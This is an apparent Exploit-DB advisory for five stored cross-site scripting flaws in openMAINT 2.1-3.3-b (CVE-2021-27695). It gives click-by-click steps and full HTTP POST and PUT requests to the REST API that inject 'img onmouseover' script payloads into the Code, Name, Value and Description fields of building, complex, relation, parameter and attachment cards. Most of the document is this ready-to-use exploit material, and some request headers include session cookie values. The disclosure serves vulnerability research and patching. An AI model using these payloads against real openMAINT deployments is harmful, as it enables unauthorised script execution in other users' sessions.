openMAINT openMAINT 2.1-3.3-b – ‘Multiple’ Persistent Cross-Site Scripting

  • 作者: Hosein Vita
    日期: 2021-03-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49649/
  • # Exploit Title: openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting
# Date: 13/03/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.openmaint.org/
# Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/
# Version: 2.1-3.3
# Tested on: Linux
# CVE: CVE-2021-27695

Summary:

Multiple stored cross-site scripting (XSS) vulnerabilities in openMAINT 2.1-3.3-b allow remote attackers to inject arbitrary web script or HTML via any "Add" sections, such as Add Card Building & Floor, or others in the Name And Code Parameters.

Proof of concepts : 

1-Login to you'r Dashboard As a low privilege user
2-Click On Facilities and assets - Location - Sites 
3- +Add card Building
4- Code and name parameters both are vulnerable 


POST /openmaint/services/rest/v3/classes/Building/cards?_dc=1615626728539 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
.....
Cookie: ...


{"_type":"Building","_tenant":"","Code":"\"><img src=code onmouseover=alert(1)>","Description":null,"Name":"\"><img src=name onmouseover=alert(1)>",....}


The Xss willtrigger in that form, and also if you click on "Map" button , the xss will trigger there



------------------------------------------------------------------------
Another Xss :

1-Like above in Facilities click on Locations and click on complex 
2-click + Add card Complex
3-insert javascript payload to Code And Name


POST /openmaint/services/rest/v3/classes/Complex/cards?_dc=1615627279082 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
....
Connection: close
Referer: 
Cookie: ....

{"_type":"Complex","_tenant":"","Code":"\"><img src=complex onmouseover=alert(1)>","Description":null,"Name":"\"><img src=complex onmouseover=alert(1)>",...}


4-Save it
5-Back to Sites and click on previous card
6- in position section click on "Complex" drop down 
7- xss will trigger


------------------------------------------------------------------------
Another Xss:

1-Like exmaples above go to Locations and click on Sites 
2-Add Card Building or clickthe one you created before
3-in left menu click on "Relations" 
4-click "Add relations" and select one of the options 
5- Add Card and select one of the options
6- insert javascript payload to code and name parameter 

POST /openmaint/services/rest/v3/classes/Alarm/cards?_dc=1615628392695 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Connection: close
Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578

{"_type":"","_tenant":"","Code":"\"><img src=add relation onmouseover=alert(3)>","Name":"\"><img src=add relation onmouseover=alert(3)>","Description":null,..... }


7- save it and close the form
8-click on the card and there an option which is "Open Relation Graph" click on it and click on card list 
9- xss payload will trigger

------------------------------------------------------

Another Xss:

1- In "Navigation" Bar click on "Configurations" 
2- Click on parameter
3- + Add card Parameter
4- Insert javascript payload to Code and Value 

PUT /openmaint/services/rest/v3/classes/Parameter/cards/385606?_dc=1615629885175 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json

Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578

{"_type":"Parameter","_tenant":"","Area":null,"Code":"--'\"><img src=cardparameter onmouseover=alert(4)>","Description":null,"Value":"--'\"><img src=cardparameter onmouseover=alert(5)>",....}

save it and like the previous one click on "Open Relation Graph" and in card List your xss will trigger


-------------------------------------------------------

Another Xss:

1-Click Facilities and assets
2-Locations
3-Select one of cards 
4-Click "Add Card"
5-in "Attachments" tab click "Add attachment" select "Document" or "image"
6-insert javascript payload in "Code" and "Description"


PUT /openmaint/services/rest/v3/classes/Complex/cards/384220/attachments/apovsxflx4j269tx08h1eoayg2vn9eyhbfh06079bm37cr7uk63l75oetcmzc1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
CMDBuild-ActionId: class.card.attachments.open
CMDBuild-RequestId: 52807186-932d-448b-bfe3-8a51b596bcb8
Content-Type: multipart/form-data; boundary=---------------------------1049383330380851725139941543
Content-Length: 1020
Connection: close
Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578

-----------------------------1049383330380851725139941543
Content-Disposition: form-data; name="attachment"; filename="blob"
Content-Type: application/json

{"_....."Code":"--'\"><img src=attach onmouseover=alert(7)>","Description":"--'\"><img src=attach onmouseover=alert(7)>","...}
-----------------------------1049383330380851725139941543--

7-save it and xss will trigger